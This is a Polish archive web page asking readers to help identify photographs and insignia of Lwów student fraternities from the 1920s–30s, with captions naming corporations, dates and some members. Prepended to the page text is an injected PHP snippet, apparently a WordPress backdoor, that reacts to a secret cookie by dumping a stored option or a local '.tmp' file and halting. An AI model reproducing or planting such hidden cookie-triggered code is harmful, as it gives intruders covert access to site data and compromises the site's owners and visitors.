if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Identyfikacja fotografii ze Lwowa

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego fotografie, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii). Celem akcji jest uzupełnienie możliwie wielu brakujących informacji.

Wiele nieopisanych bądź nie w pełni opisanych fotografii znajduje się na niemal wszystkich stronach wirtualnego Muzeum Polskich Korporacji Akademickich. Od 2010 r. dodatkowo niektóre z nich oraz wiele innych nieopisanych fotografii prezentowane są w osobnych działach tworzonych zbiorczo dla identyfikacji fotografii korporacyjnych z jednego ośrodka akademickiego (Identyfikacja fotografii z Wilna, Identyfikacja fotografii z Warszawy, Identyfikacja fotografii z Lublina etc). Fotografie i insygnia korporacyjne, w przypadku których nie można określić ośrodka akademickiego, z którego pochodzą, można zobaczyć w zbiorczym zestawieniu - Identyfikacja fotografii.

Zależałoby nam na ustaleniu możliwie wielu istotnych dla opisu fotografii (bądź innych pamiątek) faktów, w szczególności nazwy korporacji ze zdjęcia, osoby/osób na nim przedstawionych, miejsca i czasu wykonania fotografii. Będziemy wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych zdjęć i innych pamiątek korporacyjnych (vide Kontakt).

Banda korporacyjna

0.1. Banda korporacyjna.

Jednostronna, materiałowa banda korporacyjna: purpurowo(ciemnoróżowo)-zielono-srebrna.

Długość bandy wynosi 53 cm., a szerokość 3 cm. Na obu końcach bandy widoczne są dziurki do przymocowania.

Banda została nabyta razem z deklem Korporacji Kujawja i według słów jej byłego właściciela “zawsze była przy deklu”.

Kolory bandy zdają się odpowiadać barwom Korporacji Cresovia Leopoliensis (amarantowo-zielono-srebrne).

_________________________________________________________________________________________

Grupa korporantów, Lwów 2 V 1929 r.

0.2. Grupa korporantów, Lwów 2 V 1929 r.

Fotografia przedstawia grupę korporantów w dniu 2 V 1929 r. Być może jest to spotkanie międzykorporacyjne (Lwowskiego Koła Międzykorporacyjnego ?) bądź komers rocznicowy jednej z lwowskich korporacji (V-lecie Scythii ?). Istotne byłoby ustalenie okoliczności i miejsca wykonania zdjęcia, jak także tożsamości widocznych na fotografii osób.

Grupa członków korporacji lwowskich, początek lat 30-tych (?).

0.3. Grupa członków korporacji lwowskich, początek lat 30-tych (?).

Fotografia przedstawia grupę lwowskich korporantów. Puchary w rękach wskazują, że może to być pamiątkowe zdjęcie po turnieju sportowym (szermierczym, strzeleckim…). Istotne byłoby ustalenie okoliczności, miejsca, daty wykonania fotografii, jak także tożsamości widocznych na zdjęciu osób.

Korporant, 1933 r.

0.4. Korporant I.

Korporant, prawdopodobnie członek jednej z korporacji lwowskich na X-leciu Korporacji Leopolia w 1933 r. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Korporant, 1933 r.

0.5. Korporant II.

Korporant, prawdopodobnie członek jednej z korporacji lwowskich na X-leciu Korporacji Leopolia w 1933 r. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Korporant, 1933 r.

0.6. Korporant III.

Korporant, prawdopodobnie członek jednej z korporacji lwowskich na X-leciu Korporacji Leopolia w 1933 r. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Korporant, 1933 r.

0.7. Korporant IV.

Korporant, prawdopodobnie członek jednej z korporacji lwowskich na X-leciu Korporacji Leopolia w 1933 r. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Korporant, 1933 r.

0.8. Korporant V.

Korporant, prawdopodobnie członek jednej z korporacji lwowskich na X-leciu Korporacji Leopolia w 1933 r. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Dwóch korporantów ze Lwowa, od lewej Mieczysław Pryma.

0.9. Dwóch korporantów ze Lwowa.

Fotografia przedstawia dwóch członków prawdopodobnie korporacji ze Lwowa (od lewej Mieczysław Pryma). Istotne byłoby ustalenie nazwy korporacji, jak także tożsamości drugiej z osób widocznych na fotografii osób.

Korporacja ze Lwowa, drugi od lewej siedzi Mieczysław Pryma.

0.10. Korporacja ze Lwowa.

Fotografia przedstawia prawdopodobnie uroczystość (rocznicową ?) jednej z korporacji lwowskich (drugi od lewej siedzi Mieczysław Pryma). Istotne byłoby ustalenie nazwy korporacji, jak także tożsamości osób widocznych na fotografii osób.

Poczty sztandarowe korporacji w pochodzie, Lwów.

0.11. Poczty sztandarowe korporacji w pochodzie, Lwów.

Nieopisana fotografia wykonana w Zakładzie Marka Muenza, Lwów ul. Jagiellońska 15.

Istotne byłoby ustalenie daty, okoliczności, miejsca zrobienia fotografii, jak także tożsamości choćby części widocznych na niej osób.

Widoczne na fotografii szyldy sklepów i instytucji wskazują, że pochód przechodzi przez Plac Mariacki. Być może kieruje się w kierunku pomnika Mickiewicza bądź też Wałów Hetmańskich. Informacja dodana dnia 8 V 2009 r. dzięki pomocy Jakuba Boguckiego z K! Magna Polonia Vratislaviensis.

Poczty sztandarowe korporacji przed kościołem.

0.12. Poczty sztandarowe korporacji przed kościołem.

Nieopisana fotografia przedstawiająca poczty sztandarowe korporacji wychodzące z kościoła. Być może, choć to jedynie luźny domysł, fotografia pochodzi ze Lwowa. Istotne byłoby ustalenie daty, okoliczności, miejsca zrobienia fotografii, jak także tożsamości choćby części widocznych na niej osób.

Fotografia wykonana przed wejściem do Kościoła św. Marii Magdaleny we Lwowie. Informacja dodana dnia 31 VII 2011 r. dzięki pomocy Pawła Kowalewskiego.

Poczty sztandarowe korporacji w sali.

0.13. Poczty sztandarowe korporacji w sali.

Nieopisana fotografia przedstawiająca poczty sztandarowe korporacji wychodzące z kościoła. Być może, choć to jedynie luźny domysł, fotografia pochodzi ze Lwowa. Istotne byłoby ustalenie daty, okoliczności, miejsca zrobienia fotografii, jak także tożsamości choćby części widocznych na niej osób.

Korporanci ze Lwowa.

0.14. Prezesi (?) korporacji lwowskich, prawd. koniec lat 20-tych.

Nieopisana fotografia przedstawiająca prezesów (?) korporacji lwowskich prawdopodobnie w końcu lat 20-tych. Istotne byłoby ustalenie daty, okoliczności, miejsca zrobienia fotografii, jak także tożsamości widocznych na niej osób.

Prezydium Komersu Ogólnokorporacyjnego zorganizowanego w czasie VIII Zjazdu ZPKA we Lwowie, od lewej: Tadeusz Koehler z K! Znicz, przewodniczący części oficjalnej Komersu Alojzy Bąk z K! Lutyko-Venedya, Ludwik Zahradnik z K! Leopolia, przewodniczący części nieoficjalnej Komersu Tadeusz Radzikowski z K! Gasconia), Lwów 8 VIII 1928 r. Informacja dodana dnia 19 VII 2011 r. dzięki opisowi z Wiadomości Korporacyjnych z dnia 16 I 1929, nr 8 (17).

_________________________________________________________________________________________

Legja Akademicka Lutyko-Venedyi, Lwów 3 V 1929 r.

1.1. Lutyko-Venedya, Lwów 1929 r.

Fotografia przedstawia grupę członków Korporacji Lutyko-Venedya - członków Legji Akademickiej. Istotne byłoby ustalenie tożsamości widocznych na fotografii osób.

Przed pomnikiem Adama Mickiewicza w trakcie obchodów 45 rocznicy powstania Lutyko-Venedyi (?), Lwów 24 (?) XI 1929 r.?

1.2. Przed pomnikiem Adama Mickiewicza w trakcie obchodów 45 rocznicy powstania Lutyko-Venedyi (?), Lwów 24 (?) XI 1929 r.?

Według jednego z opisów na odwrocie fotografii, przedstawia ona grupę członków Korporacji Lutyko-Venedya w trakcie obchodów 45-lecia Korporacji przed pomnikiem Adama Mickiewicza we Lwowie. Istotne byłoby potwierdzenie tej informacji.

Lutyko-Venedya, Lwów prawd. ok. 1930 r.

1.3. Lutyko-Venedya, Lwów ok. 1930 r. (?).

Fotografia przedstawia Korporację Lutyko-Venedya (być może coetus Korporacji). Istotne byłoby ustalenie daty wykonania zdjęcia, jak także tożsamości widocznych na fotografii osób.

Coetus Lutyko-Venedyi w sem. let. 1930/31, Lwów 1931 r.

1.4. Coetus Lutyko-Venedyi w 1931 r.

Fotografia przedstawia coetus Korporacji Lutyko-Venedya w czasie, gdy oldermanem był Tadeusz Winiecki. Istotne byłoby ustalenie daty wykonania zdjęcia, jak także tożsamości widocznych na fotografii osób.

Lutyko-Venedya, Lwów druga poł. lat 30-tych.

1.5. Lutyko-Venedya za prezesury Kazimierza Gintrowicza w drugiej poł. lat 30-tych.

Fotografia przedstawia Korporację Lutyko-Venedya za prezesury Kazimierza Gintrowicza. Istotne byłoby ustalenie okoliczności i daty wykonania zdjęcia, jak także tożsamości widocznych na zdjęciu osób.

Trzej członkowie Korporacji Lutyko-Venedya, pierwsza poł. lat. 30-tych.

1.6. Trzej członkowie Korporacji Lutyko-Venedya.

Fotografia przedstawia trzech członków Korporacji Lutyko-Venedya, prawdopodobnie w pierwszej połowie lat 30-tych. Istotne byłoby ustalenie daty oraz tożsamości osób widocznych na zdjęciu.

Członek Korporacji Lutyko-Venedya, 1937 r.

1.7. Członek Korporacji Lutyko-Vendya II.

Jak wynika z opisu na odwrocie fotografii przedstawia ona członka Lutyko-Venedyi, ojca korporacyjnego Kazimierza Gintrowicza. Zdjęcie zostało wykonane w Inowrocławiu, podpis niewyraźny (być może “Jurek”, “Imek”, “Janek”). Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Członek Korporacji Lutyko-Venedya, lata 30-te (?).

1.8. Członek Korporacji Lutyko-Vendya III.

Jak wynika z opisu fotografia przedstawia członka Lutyko-Venedyi i jest dedykowana Florianowi Pierańskiemu. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Członek Korporacji Lutyko-Venedya, 1933 r.

1.9. Członek Korporacji Lutyko-Vendya.

Prawdopodobnie członek Korporacji Lutyko-Venedya na X-leciu Korporacji Leopolia w 1933 r. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

_________________________________________________________________________________________

Odnowiona Lutycja, w środku siedzi Jan Szukszta, Lwów ok. 1935 r.

2.1. Odnowiona Lutycja, prawd. Lwów ok. 1935 r.

Fotografia przedstawia odnowioną Lutycję. Istotne byłoby ustalenie okoliczności i daty wykonania zdjęcia, jak także tożsamości widocznych na zdjęciu osób.

Odnowiona Lutycja, w środku siedzi Jan Szukszta, Lwów ok. 1935 r.

2.2. Odnowiona Lutycja, Lwów ok. 1935 r.

Fotografia przedstawia odnowioną Lutycję. Istotne byłoby ustalenie okoliczności i daty wykonania zdjęcia, jak także tożsamości widocznych na zdjęciu osób.

_________________________________________________________________________________________

Korporacja Leopolia (?), Lwów lata 20-te (?).

3.1. Korporacja Leopolia (?).

Fotografia przedstawia prawdopodobnie Korporację Leopolia. Istotne byłoby ustalenie okoliczności, daty i miejsca wykonania zdjęcia, a także tożsamości osób widocznych na fotografii.

Korporacja Leopolia (?), Lwów lata 20-te (?).

3.2. Korporacja Leopolia (?).

Fotografia przedstawia prawdopodobnie Korporację Leopolia. Istotne byłoby ustalenie okoliczności, daty i miejsca wykonania zdjęcia, a także tożsamości osób widocznych na fotografii.

Członek Korporacji Leopolia, 1933 r.

3.3. Członek Korporacji Leopolia.

Prawdopodobnie członek Korporacji Leopolia w 1933 r. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Członek Korporacji Leopolia, 1933 r.

3.4. Członek Korporacji Leopolia II.

Prawdopodobnie członek Korporacji Leopolia w 1933 r. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Członek Korporacji Leopolia, lata 20-te.

3.5. Członek Korporacji Leopolia, lata 20-te.

Członek Korporacji Leopolia. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii, a także daty i miejsca wykonania zdjęcia.

_________________________________________________________________________________________

Prezydium Znicza, Lwów 20 IV 1936 r.

4.1. Prezydium Znicza w 1936 r.

Fotografia przedstawia Prezydium K! Znicz w 1936 r. (pierwszy z prawej siedzi Józef Romaszkiewicz). Istotne byłoby ustalenie tożsamości widocznych na fotografii osób.

_________________________________________________________________________________________

Prezydium Gasconii.

5.1. Prezydium Gasconii

Fotografia przedstawia prezydium Gasconii. Istotne byłoby ustalenie tożsamości widocznych na fotografii osób, a także dokładnej roku i daty wykonania zdjęcia.

Gascończycy, Lwów 1932 r.

5.2. Gascończycy, 1932 r.

Fotografia przedstawia grupę członków Gasconii w 1932 r. (u góry Tadeusz Figiel). Istotne byłoby ustalenie tożsamości widocznych na fotografii osób, a także miejsca i dokładnej daty wykonania zdjęcia.

_________________________________________________________________________________________

Poczet sztandarowy Scythii na uroczystościach XX-lecia niepodległości, Lwów listopad 1938 r.

6.1. Poczet sztandarowy Scythii na uroczystościach XX-lecia niepodległości

Fotografia przedstawia poczet sztandarowy Scythii podczas obchodów XX-lecia niepodległości w listopadzie 1938 r. (pierwszy z prawej Leonid Samsonow). Istotne byłoby ustalenie tożsamości pozostałych widocznych na zdjęciu osób.

_________________________________________________________________________________________

Poczet sztandarowy Aragonii, Lwów 4 V 1929 r.

8.1. Poczet sztandarowy Aragonii w 1929 r.

Fotografia przedstawia poczet sztandarowy Aragonii w dniu obchodów Święta 3 Maja w 1929 r. Istotne byłoby ustalenie tożsamości widocznych na niej osób.

Grupa członków Aragonii przed defiladą z okazji Święta 3 Maja, Lwów 4 V 1929 r.

8.2. Grupa członków Aragonii, 1929 r.

Fotografia przedstawia grupę członków Aragonii przed defiladą z okazji Święta 3 Maja w 1929 r. Istotne byłoby ustalenie tożsamości widocznych na niej osób.

_________________________________________________________________________________________

Prezydium i Komitet Zabawowy K! Zagończyk, 8 II 1931 r.

9.1. Prezydium i Komitet Zabawowy K! Zagończyk, 8 II 1931 r.

Fotografia przedstawia Prezydium i Komitet Zabawowy K! Zagończyk nad ranem po zabawie w salach Towarzystwa Szkoły Ludowej przy ul. Czarneckiego 1 (w środku prawd. prezes Edward Böhm, poniżej prawd. Alfred Brubacher). Istotne byłoby ustalenie tożsamości pozostałych na zdjęciu osób.

_________________________________________________________________________________________

Poczet sztandarowy Cresovii, Lwów ok. 1934 r.

12.1. Poczet sztandarowy Cresovii Leopoliensis.

Fotografia przedstawia poczet sztandarowy Cresovii Leopoliensis prawdopodobnie ok. 1934 r. Istotne byłoby ustalenie daty, okoliczności i miejsca wykonania fotografii, jak także tożsamości widocznych na niej osób.

Poczet sztandarowy Cresovii, prawd. defilada z okazji Święta 3 Maja, Lwów 3 maja (?) 1934 r. (?)

12.2. Poczet sztandarowy Cresovii Leopoliensis II.

Fotografia przedstawia poczet sztandarowy Cresovii Leopoliensis w czasie defilady być może z okazji Święta 3 Maja w 1934 r. Istotne byłoby ustalenie daty, okoliczności i miejsca wykonania fotografii, jak także tożsamości widocznych na niej osób.

_________________________________________________________________________________________

Członek Korporacji Śląsk, pierwsza połowa lat 30-tych.

17.1. Członek Korporacji Śląsk.

Członek Korporacji Śląsk. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Członek Korporacji Śląsk, 1933 r.

17.2. Członek Korporacji Śląsk II.

Prawdopodobnie Członek Korporacji Śląsk. Istotne byłoby ustalenie tożsamości osoby widocznej na fotografii.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 3 X 2010 r.
Ostatnia zmiana: 17 VII 2011 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Identyfikacja fotografii ze Lwowa, (na:) www.archiwumkorporacyjne.pl, stan 17 VII 2011 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }